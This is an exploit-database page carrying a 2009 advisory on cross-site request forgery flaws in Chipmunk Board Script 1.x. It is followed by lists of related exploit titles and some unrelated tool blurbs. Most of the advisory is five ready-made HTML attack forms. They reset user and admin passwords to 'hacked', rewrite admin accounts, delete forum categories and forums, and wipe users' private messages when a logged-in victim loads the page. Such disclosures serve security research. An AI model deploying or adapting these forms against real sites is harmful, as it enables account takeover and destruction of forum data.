Menu

Search for hundreds of thousands of exploits

"Chipmunk Board Script 1.x - Multiple Cross-Site Request Forgery Vulnerabilities"

Author

Exploit author

"Milos Zivanovic"

Platform

Exploit platform

php

Release date

Exploit published date

2009-12-13

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
[-------------------------------------------------------------------------------------------------]
[   Title: Chipmunk Board Script 1.x Multiple XSRF Vulnerabilities                                ]
[   Author: Milos Zivanovic                                                                       ]
[   Email: milosz.security[at]gmail.com<http://gmail.com>                                                           ]
[   Date: 11. December 2009.                                                                      ]
[-------------------------------------------------------------------------------------------------]

[-------------------------------------------------------------------------------------------------]
[   Application: Chipmunk Board Script                                                            ]
[   Version: 1.X                                                                                  ]
[   Download: http://www.chipmunk-scripts.com/chipmunkcms/chipmunkcms.zip                         ]
[   Vulnerability: Cross Site Request Forgery                                                     ]
[-------------------------------------------------------------------------------------------------]

I installed this board script locally and started looking, it didn't take much to notice first
vulnerability. I found many vulnerabilities that could be exploited via cross site request forgery
method, but i'm only going to show you more important ones.

This board script doesn't have any XSRF protection thus allowing us to do many things we shouldn't
:)

[#]Content
 |--Change user settings (usercp)
 |--Change user settings (admincp)
 |--Delete category
 |--Delete forum
 |--Delete read private messages

Every exploit that has

[*]Change user settings (usercp)

This exploit will change this info for every user that opens it and is logged in.

[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/cboard/usercp.php" method="POST">
  <input type='hidden' name='username' value=''>
  <input type='password' name='password' value='hacked'>
  <input type='password' name='password2' value='hacked'>
  <input type='hidden' name='usepm' value='1'>
  <input type='text' name='email' value='email@mail.com<mailto:email@mail.com>'>
  <input type='text' name='location' value='Moon'>
  <input type='text' name='aim' value='AIM:...'>
  <input type='text' name='icq' value='ICQ:...'>
  <input type='hidden' name='showprofile' value='1'>
  <input type='hidden' name='avatar' value=''>
  <input type='hidden' name='forumtemplate' value='1'>
  <textarea name='signature'>Free your mind and the ass will follow.&lt;/textarea&gt;
  <input type='submit' name='submit' value='change details'>
</form>

[EXPLOIT------------------------------------------------------------------------------------------]

[*]Change user settings (admincp)

Note: Change [ID] to the id of the forum admin.
(you can view that by viewing his profile on the forum, usually 1-2)
Admins must run this exploit.

[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/cboard/admin/edituser.php" method="POST">
  <input type='hidden' name='userid' value='[ID]'>
  <input type='text' name='username' value='admin'>
  <input type='password' name='password' value='hacked'>
  <input type='hidden' name='userstatus' value='4'>
  <input type='text' name='email' value='email@mail.com<mailto:email@mail.com>'>
  <input type='text' name='rank' value='0'>
  <input type='hidden' name='isbanned' value='No'>
  <textarea name='sig'>this is my signature&lt;/textarea&gt;
  <input type='submit' name='submit' value='Edit This user'>
</form>

[EXPLOIT------------------------------------------------------------------------------------------]

[-]Delete category

Note: Change [ID] to the id of the category you want to delete.
Admins must run this exploit.

[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/cboard/admin/deletecat.php?categoryid=[ID]" method="POST">
  <input type='hidden' name='catid' value='[ID]'>
  <input type='submit' name='submit' value='Delete This Forum'>
</form>

[EXPLOIT------------------------------------------------------------------------------------------]

[-]Delete forum

Note: Change [ID] to the id of the forum you want to delete.
Admins must run this exploit.

[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/cboard/admin/deleteforum.php?ID=[ID]" method="POST">
  <input type='hidden' name='ID' value='[ID]'>
  <input type='submit' name='submit' value='Delete This Forum'>
</form>

[EXPLOIT------------------------------------------------------------------------------------------]

[-]Delete read private messages

This exploit will delete read private messages for every user that opens it and is logged in.

[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/cboard/pm/deleteread.php" method="POST">
  <input type='submit' name='submit' value='delete'>
</form>

[EXPLOIT------------------------------------------------------------------------------------------]

[-------------------------------------------------------------------------------------------------]
[                                              EOF                                                ]
[-------------------------------------------------------------------------------------------------]
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2010-02-07 "Croogo 1.2.1 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php "Milos Zivanovic"
2010-02-03 "KubeLance 1.7.6 - Cross-Site Request Forgery (Add Admin)" webapps php "Milos Zivanovic"
2010-01-22 "KosmosBlog 0.9.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery" webapps php "Milos Zivanovic"
2010-01-02 "eazyPortal 1.0.0 - Multiple Vulnerabilities" webapps php "Milos Zivanovic"
2009-12-16 "eUploader PRO 3.1.1 - Cross-Site Request Forgery / Cross-Site Scripting" webapps php "Milos Zivanovic"
2009-12-16 "Recipe Script 5.0 - Arbitrary File Upload / Cross-Site Request Forgery / Cross-Site Scripting" webapps php "Milos Zivanovic"
2009-12-16 "BOLDfx Recipe Script 5.0 - Multiple Remote Vulnerabilities" webapps php "Milos Zivanovic"
2009-12-16 "BOLDfx eUploader 3.1.1 - 'admin.php' Multiple Remote Vulnerabilities" webapps php "Milos Zivanovic"
2009-12-15 "Ez Blog 1.0 - Cross-Site Scripting / Cross-Site Request Forgery" webapps php "Milos Zivanovic"
2009-12-15 "Ez Cart 1.0 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php "Milos Zivanovic"
2009-12-15 "Ez News Manager / Pro - Cross-Site Request Forgery (Change Admin Password)" webapps php "Milos Zivanovic"
2009-12-15 "Scriptsez Ez FAQ Maker 1.0 - Cross-Site Scripting / Cross-Site Request Forgery" webapps php "Milos Zivanovic"
2009-12-15 "Ez Faq Maker - Multiple Vulnerabilities" webapps php "Milos Zivanovic"
2009-12-14 "Smart PHP Subscriber - Multiple Disclosure Vulnerabilities" webapps php "Milos Zivanovic"
2009-12-14 "Ez Guestbook 1.0 - Multiple Vulnerabilities" webapps php "Milos Zivanovic"
2009-12-14 "Ez Poll Hoster - Multiple Cross-Site Scripting Vulnerabilities" webapps php "Milos Zivanovic"
2009-12-14 "Ez Poll Hoster - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities" webapps php "Milos Zivanovic"
2009-12-14 "mini Hosting Panel - Cross-Site Request Forgery (Change Admin Settings)" webapps php "Milos Zivanovic"
2009-12-14 "Mail Manager Pro - Cross-Site Request Forgery (Change Admin Password)" webapps linux "Milos Zivanovic"
2009-12-13 "Chipmunk Board Script 1.x - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php "Milos Zivanovic"
2009-12-13 "Frog CMS 0.9.5 - Cross-Site Request Forgery" webapps php "Milos Zivanovic"
2009-12-13 "AccStatistics 1.1 - Cross-Site Request Forgery (Change Admin Settings)" webapps php "Milos Zivanovic"
2009-12-11 "Chipmunk NewsLetter - Cross-Site Request Forgery" webapps php "Milos Zivanovic"
2009-12-11 "oBlog - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin Brute Force" webapps php "Milos Zivanovic"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.